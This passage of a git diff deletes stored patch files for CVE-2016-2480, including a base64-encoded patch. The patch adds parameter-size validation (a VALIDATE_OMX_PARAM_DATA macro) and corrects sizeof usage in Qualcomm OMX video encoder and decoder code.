-+                VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_CONFIG_LTRMARK_TYPE);
-                 QOMX_VIDEO_CONFIG_LTRMARK_TYPE* pParam = (QOMX_VIDEO_CONFIG_LTRMARK_TYPE*)configData;
-                 if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)QOMX_IndexConfigVideoLTRMark)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting LTR mark failed");
-@@ -1746,6 +1788,7 @@
-             }
-         case OMX_IndexConfigVideoAVCIntraPeriod:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_AVCINTRAPERIOD);
-                 OMX_VIDEO_CONFIG_AVCINTRAPERIOD *pParam = (OMX_VIDEO_CONFIG_AVCINTRAPERIOD*) configData;
-                 DEBUG_PRINT_LOW("set_config: OMX_IndexConfigVideoAVCIntraPeriod");
-                 if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)OMX_IndexConfigVideoAVCIntraPeriod)) {
-@@ -1757,6 +1800,7 @@
-             }
-         case OMX_IndexConfigCommonDeinterlace:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_DEINTERLACE);
-                 OMX_VIDEO_CONFIG_DEINTERLACE *pParam = (OMX_VIDEO_CONFIG_DEINTERLACE*) configData;
-                 DEBUG_PRINT_LOW("set_config: OMX_IndexConfigCommonDeinterlace");
-                 if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)OMX_IndexConfigCommonDeinterlace)) {
-@@ -1768,6 +1812,7 @@
-             }
-         case OMX_QcomIndexConfigVideoVencPerfMode:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, QOMX_EXTNINDEX_VIDEO_PERFMODE);
-                 QOMX_EXTNINDEX_VIDEO_PERFMODE* pParam = (QOMX_EXTNINDEX_VIDEO_PERFMODE*)configData;
-                 if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)OMX_QcomIndexConfigVideoVencPerfMode)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting OMX_QcomIndexConfigVideoVencPerfMode failed");
-@@ -1777,6 +1822,7 @@
-             }
-         case OMX_IndexConfigPriority:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_PARAM_U32TYPE);
-                 if (!handle->venc_set_config(configData, (OMX_INDEXTYPE)OMX_IndexConfigPriority)) {
-                     DEBUG_PRINT_ERROR("Failed to set OMX_IndexConfigPriority");
-                     return OMX_ErrorUnsupportedSetting;
-@@ -1785,6 +1831,7 @@
-             }
-         case OMX_IndexConfigOperatingRate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_PARAM_U32TYPE);
-                 if (!handle->venc_set_config(configData, (OMX_INDEXTYPE)OMX_IndexConfigOperatingRate)) {
-                     DEBUG_PRINT_ERROR("Failed to set OMX_IndexConfigOperatingRate");
-                     return handle->hw_overload ? OMX_ErrorInsufficientResources :
diff --git a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch.base64
deleted file mode 100644
index f954ff7c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL21tLWNvcmUvaW5jL09NWF9RQ09NRXh0bnMuaCBiL21tLWNvcmUvaW5jL09NWF9RQ09NRXh0bnMuaAppbmRleCBmMGUxNTkzLi5lYjFiOTkwIDEwMDY0NAotLS0gYS9tbS1jb3JlL2luYy9PTVhfUUNPTUV4dG5zLmgKKysrIGIvbW0tY29yZS9pbmMvT01YX1FDT01FeHRucy5oCkBAIC0xLDUgKzEsNSBAQAogLyotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQotQ29weXJpZ2h0IChjKSAyMDA5LTIwMTUsIFRoZSBMaW51eCBGb3VuZGF0aW9uLiBBbGwgcmlnaHRzIHJlc2VydmVkLgorQ29weXJpZ2h0IChjKSAyMDA5LTIwMTYsIFRoZSBMaW51eCBGb3VuZGF0aW9uLiBBbGwgcmlnaHRzIHJlc2VydmVkLgogCiBSZWRpc3RyaWJ1dGlvbiBhbmQgdXNlIGluIHNvdXJjZSBhbmQgYmluYXJ5IGZvcm1zLCB3aXRoIG9yIHdpdGhvdXQKIG1vZGlmaWNhdGlvbiwgYXJlIHBlcm1pdHRlZCBwcm92aWRlZCB0aGF0IHRoZSBmb2xsb3dpbmcgY29uZGl0aW9ucyBhcmUgbWV0OgpAQCAtMTM0OCw2ICsxMzQ4LDggQEAKIH0gUU9NWF9WSURFT19RVUVSWV9ERUNPREVSX0lOU1RBTkNFUzsKIAogdHlwZWRlZiBzdHJ1Y3QgUU9NWF9FTkFCTEVUWVBFIHsKKyAgICBPTVhfVTMyIG5TaXplOworICAgIE9NWF9WRVJTSU9OVFlQRSBuVmVyc2lvbjsKICAgICBPTVhfQk9PTCBiRW5hYmxlOwogfSBRT01YX0VOQUJMRVRZUEU7CiAKQEAgLTE0NTEsNiArMTQ1Myw4IEBACiAKIAogdHlwZWRlZiBzdHJ1Y3QgUU9NWF9SRUNUVFlQRSB7CisgICAgT01YX1UzMiBuU2l6ZTsKKyAgICBPTVhfVkVSU0lPTlRZUEUgblZlcnNpb247CiAgICAgT01YX1MzMiBuTGVmdDsKICAgICBPTVhfUzMyIG5Ub3A7CiAgICAgT01YX1UzMiBuV2lkdGg7CkBAIC0xNTUxLDcgKzE1NTUsNiBAQAogICAgIFFPTVhfVklERU9fSElFUkFSQ0hJQ0FMQ09ESU5HVFlQRSBlSGllcmFyY2hpY2FsQ29kaW5nVHlwZTsKIH0gUU9NWF9WSURFT19ISUVSQVJDSElDQUxMQVlFUlM7CiAKLQogI2lmZGVmIF9fY3BsdXNwbHVzCiB9CiAjZW5kaWYgLyogX19jcGx1c3BsdXMgKi8KZGlmZiAtLWdpdCBhL21tLXZpZGVvLXY0bDIvdmlkYy9jb21tb24vaW5jL3ZpZGNfZGVidWcuaCBiL21tLXZpZGVvLXY0bDIvdmlkYy9jb21tb24vaW5jL3ZpZGNfZGVidWcuaAppbmRleCBkN2ExNThjLi4wY2U3NDdjIDEwMDc1NQotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvY29tbW9uL2luYy92aWRjX2RlYnVnLmgKKysrIGIvbW0tdmlkZW8tdjRsMi92aWRjL2NvbW1vbi9pbmMvdmlkY19kZWJ1Zy5oCkBAIC0xLDUgKzEsNSBAQAogLyotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQotQ29weXJpZ2h0IChjKSAyMDEzLCBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KK0NvcHlyaWdodCAoYykgMjAxMyAtIDIwMTYsIFRoZSBMaW51eCBGb3VuZGF0aW9uLiBBbGwgcmlnaHRzIHJlc2VydmVkLgogCiBSZWRpc3RyaWJ1dGlvbiBhbmQgdXNlIGluIHNvdXJjZSBhbmQgYmluYXJ5IGZvcm1zLCB3aXRoIG9yIHdpdGhvdXQKIG1vZGlmaWNhdGlvbiwgYXJlIHBlcm1pdHRlZCBwcm92aWRlZCB0aGF0IHRoZSBmb2xsb3dpbmcgY29uZGl0aW9ucyBhcmUgbWV0OgpAQCAtNjQsNCArNjQsMTUgQEAKICNkZWZpbmUgREVCVUdfUFJJTlRfSElHSCBwcmludGYKICNlbmRpZgogCisjZGVmaW5lIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHB0ciwgcGFyYW1UeXBlKSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAorICAgIHsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKKyAgICAgICAgaWYgKHB0ciA9PSBOVUxMKSB7IHJldHVybiBPTVhfRXJyb3JCYWRQYXJhbWV0ZXI7IH0gICAgICAgICAgICAgICAgICAgICBcCisgICAgICAgIHBhcmFtVHlwZSAqcCA9IHJlaW50ZXJwcmV0X2Nhc3Q8cGFyYW1UeXBlICo+KHB0cik7ICAgICAgICAgICAgICAgICAgICAgXAorICAgICAgICBpZiAocC0+blNpemUgPCBzaXplb2YocGFyYW1UeXBlKSkgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKKyAgICAgICAgICAgIEFMT0dFKCJJbnN1ZmZpY2llbnQgb2JqZWN0IHNpemUoJXUpIHYvcyBleHBlY3RlZCglenUpIGZvciB0eXBlICVzIixcCisgICAgICAgICAgICAgICAgICAgICh1bnNpZ25lZCBpbnQpcC0+blNpemUsIHNpemVvZihwYXJhbVR5cGUpLCAjcGFyYW1UeXBlKTsgICAgXAorICAgICAgICAgICAgcmV0dXJuIE9NWF9FcnJvckJhZFBhcmFtZXRlcjsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKKyAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCisgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAorCiAjZW5kaWYKZGlmZiAtLWdpdCBhL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcCBiL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcAppbmRleCAxOWMxNTk2Li4zYjg0NzA3IDEwMDY0NAotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvdmRlYy9zcmMvb214X3ZkZWNfbXNtODk3NC5jcHAKKysrIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvc3JjL29teF92ZGVjX21zbTg5NzQuY3BwCkBAIC0yOTc5LDYgKzI5NzksNyBAQAogICAgIH0KICAgICBzd2l0Y2ggKCh1bnNpZ25lZCBsb25nKXBhcmFtSW5kZXgpIHsKICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVBvcnREZWZpbml0aW9uOiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICpwb3J0RGVmbiA9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtUG9ydERlZmluaXRpb24iKTsKQEAgLTI5ODgsMjMgKzI5ODksMjUgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvSW5pdDogeworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUE9SVF9QQVJBTV9UWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NWF9QT1JUX1BBUkFNX1RZUEUgKnBvcnRQYXJhbVR5cGUgPQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfUE9SVF9QQVJBTV9UWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1WaWRlb0luaXQiKTsKIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG9ydFBhcmFtVHlwZS0+blZlcnNpb24ublZlcnNpb24gPSBPTVhfU1BFQ19WRVJTSU9OOwotICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG9ydFBhcmFtVHlwZS0+blNpemUgPSBzaXplb2YocG9ydFBhcmFtVHlwZSk7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwb3J0UGFyYW1UeXBlLT5uU2l6ZSA9IHNpemVvZihPTVhfUE9SVF9QQVJBTV9UWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBvcnRQYXJhbVR5cGUtPm5Qb3J0cyAgICAgICAgICAgPSAyOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG9ydFBhcmFtVHlwZS0+blN0YXJ0UG9ydE51bWJlciA9IDA7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9Qb3J0Rm9ybWF0OiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX1BPUlRGT1JNQVRUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX1BPUlRGT1JNQVRUWVBFICpwb3J0Rm10ID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfVklERU9fUEFSQU1fUE9SVEZPUk1BVFRZUEUgKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1WaWRlb1BvcnRGb3JtYXQiKTsKIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwb3J0Rm10LT5uVmVyc2lvbi5uVmVyc2lvbiA9IE9NWF9TUEVDX1ZFUlNJT047Ci0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBvcnRGbXQtPm5TaXplICAgICAgICAgICAgID0gc2l6ZW9mKHBvcnRGbXQpOworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwb3J0Rm10LT5uU2l6ZSAgICAgICAgICAgICA9IHNpemVvZihPTVhfVklERU9fUEFSQU1fUE9SVEZPUk1BVFRZUEUpOwogCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgwID09IHBvcnRGbXQtPm5Qb3J0SW5kZXgpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgwID09IHBvcnRGbXQtPm5JbmRleCkgewpAQCAtMzA0NiwyMiArMzA0OSwyNCBAQAogICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKkNvbXBvbmVudCBzaG91bGQgc3VwcG9ydCB0aGlzIHBvcnQgZGVmaW5pdGlvbiovCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1BdWRpb0luaXQ6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1BPUlRfUEFSQU1fVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUE9SVF9QQVJBTV9UWVBFICphdWRpb1BvcnRQYXJhbVR5cGUgPQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfUE9SVF9QQVJBTV9UWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1BdWRpb0luaXQiKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF1ZGlvUG9ydFBhcmFtVHlwZS0+blZlcnNpb24ublZlcnNpb24gPSBPTVhfU1BFQ19WRVJTSU9OOwotICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaW9Qb3J0UGFyYW1UeXBlLT5uU2l6ZSA9IHNpemVvZihhdWRpb1BvcnRQYXJhbVR5cGUpOworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaW9Qb3J0UGFyYW1UeXBlLT5uU2l6ZSA9IHNpemVvZihPTVhfUE9SVF9QQVJBTV9UWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF1ZGlvUG9ydFBhcmFtVHlwZS0+blBvcnRzICAgICAgICAgICA9IDA7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdWRpb1BvcnRQYXJhbVR5cGUtPm5TdGFydFBvcnROdW1iZXIgPSAwOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgICAgLypDb21wb25lbnQgc2hvdWxkIHN1cHBvcnQgdGhpcyBwb3J0IGRlZmluaXRpb24qLwogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtSW1hZ2VJbml0OiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QT1JUX1BBUkFNX1RZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT01YX1BPUlRfUEFSQU1fVFlQRSAqaW1hZ2VQb3J0UGFyYW1UeXBlID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoT01YX1BPUlRfUEFSQU1fVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtSW1hZ2VJbml0Iik7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbWFnZVBvcnRQYXJhbVR5cGUtPm5WZXJzaW9uLm5WZXJzaW9uID0gT01YX1NQRUNfVkVSU0lPTjsKLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGltYWdlUG9ydFBhcmFtVHlwZS0+blNpemUgPSBzaXplb2YoaW1hZ2VQb3J0UGFyYW1UeXBlKTsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGltYWdlUG9ydFBhcmFtVHlwZS0+blNpemUgPSBzaXplb2YoT01YX1BPUlRfUEFSQU1fVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbWFnZVBvcnRQYXJhbVR5cGUtPm5Qb3J0cyAgICAgICAgICAgPSAwOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW1hZ2VQb3J0UGFyYW1UeXBlLT5uU3RhcnRQb3J0TnVtYmVyID0gMDsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwpAQCAtMzA3NSw2ICszMDgwLDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1TdGFuZGFyZENvbXBvbmVudFJvbGU6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QQVJBTV9DT01QT05FTlRST0xFVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT01YX1BBUkFNX0NPTVBPTkVOVFJPTEVUWVBFICpjb21wX3JvbGU7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY29tcF9yb2xlID0gKE9NWF9QQVJBTV9DT01QT05FTlRST0xFVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY29tcF9yb2xlLT5uVmVyc2lvbi5uVmVyc2lvbiA9IE9NWF9TUEVDX1ZFUlNJT047CkBAIC0zMDg4LDIyICszMDk0LDIzIEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBBZGRlZCBmb3IgcGFyYW1ldGVyIHRlc3QgKi8KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVByaW9yaXR5TWdtdDogewotCisgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1BSSU9SSVRZTUdNVFRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUFJJT1JJVFlNR01UVFlQRSAqcHJpb3JpdHlNZ21UeXBlID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfUFJJT1JJVFlNR01UVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1Qcmlvcml0eU1nbXQiKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpb3JpdHlNZ21UeXBlLT5uVmVyc2lvbi5uVmVyc2lvbiA9IE9NWF9TUEVDX1ZFUlNJT047Ci0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW9yaXR5TWdtVHlwZS0+blNpemUgPSBzaXplb2YocHJpb3JpdHlNZ21UeXBlKTsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpb3JpdHlNZ21UeXBlLT5uU2l6ZSA9IHNpemVvZihPTVhfUFJJT1JJVFlNR01UVFlQRSk7CiAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICAgIC8qIEFkZGVkIGZvciBwYXJhbWV0ZXIgdGVzdCAqLwogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtQ29tcEJ1ZmZlclN1cHBsaWVyOiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1BBUkFNX0JVRkZFUlNVUFBMSUVSVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NWF9QQVJBTV9CVUZGRVJTVVBQTElFUlRZUEUgKmJ1ZmZlclN1cHBsaWVyVHlwZSA9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoT01YX1BBUkFNX0JVRkZFUlNVUFBMSUVSVFlQRSopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbUNvbXBCdWZmZXJTdXBwbGllciIpOwogCi0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJ1ZmZlclN1cHBsaWVyVHlwZS0+blNpemUgPSBzaXplb2YoYnVmZmVyU3VwcGxpZXJUeXBlKTsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnVmZmVyU3VwcGxpZXJUeXBlLT5uU2l6ZSA9IHNpemVvZihPTVhfUEFSQU1fQlVGRkVSU1VQUExJRVJUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnVmZmVyU3VwcGxpZXJUeXBlLT5uVmVyc2lvbi5uVmVyc2lvbiA9IE9NWF9TUEVDX1ZFUlNJT047CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgwID09IGJ1ZmZlclN1cHBsaWVyVHlwZS0+blBvcnRJbmRleCkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJ1ZmZlclN1cHBsaWVyVHlwZS0+blBvcnRJbmRleCA9IE9NWF9CdWZmZXJTdXBwbHlVbnNwZWNpZmllZDsKQEAgLTMxNDEsNiArMzE0OCw3IEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb1Byb2ZpbGVMZXZlbFF1ZXJ5U3VwcG9ydGVkOiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fUFJPRklMRUxFVkVMVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvUHJvZmlsZUxldmVsUXVlcnlTdXBwb3J0ZWQgJTA4eCIsIHBhcmFtSW5kZXgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFICpwcm9maWxlTGV2ZWxUeXBlID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFICopcGFyYW1EYXRhOwpAQCAtMzE0OSw2ICszMTU3LDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICNpZiBkZWZpbmVkIChfQU5EUk9JRF9IT05FWUNPTUJfKSB8fCBkZWZpbmVkIChfQU5EUk9JRF9JQ1NfKQogICAgICAgICBjYXNlIE9NWF9Hb29nbGVBbmRyb2lkSW5kZXhHZXRBbmRyb2lkTmF0aXZlQnVmZmVyVXNhZ2U6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIEdldEFuZHJvaWROYXRpdmVCdWZmZXJVc2FnZVBhcmFtcyk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfR29vZ2xlQW5kcm9pZEluZGV4R2V0QW5kcm9pZE5hdGl2ZUJ1ZmZlclVzYWdlIik7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR2V0QW5kcm9pZE5hdGl2ZUJ1ZmZlclVzYWdlUGFyYW1zKiBuYXRpdmVCdWZmZXJzVXNhZ2UgPSAoR2V0QW5kcm9pZE5hdGl2ZUJ1ZmZlclVzYWdlUGFyYW1zICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAobmF0aXZlQnVmZmVyc1VzYWdlLT5uUG9ydEluZGV4ID09IE9NWF9DT1JFX09VVFBVVF9QT1JUX0lOREVYKSB7CkBAIC0zMTcyLDYgKzMxODEsNyBAQAogI2lmZGVmIEZMRVhZVVZfU1VQUE9SVEVECiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleEZsZXhpYmxlWVVWRGVzY3JpcHRpb246IHsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IGRlc2NyaWJlQ29sb3JGb3JtYXQiKTsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIERlc2NyaWJlQ29sb3JGb3JtYXRQYXJhbXMpOwogICAgICAgICAgICAgICAgIGVSZXQgPSBkZXNjcmliZUNvbG9yRm9ybWF0KHBhcmFtRGF0YSk7CiAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICB9CkBAIC0zMjgyLDYgKzMyOTIsNyBAQAogICAgIH0KICAgICBzd2l0Y2ggKCh1bnNpZ25lZCBsb25nKXBhcmFtSW5kZXgpIHsKICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVBvcnREZWZpbml0aW9uOiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICpwb3J0RGVmbjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwb3J0RGVmbiA9IChPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvL1RPRE86IENoZWNrIGlmIGFueSBhbGxvY2F0ZSBidWZmZXIvdXNlIGJ1ZmZlci91c2VOYXRpdmVCdWZmZXIgaGFzCkBAIC0zNTI1LDYgKzM1MzYsNyBAQAogICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICA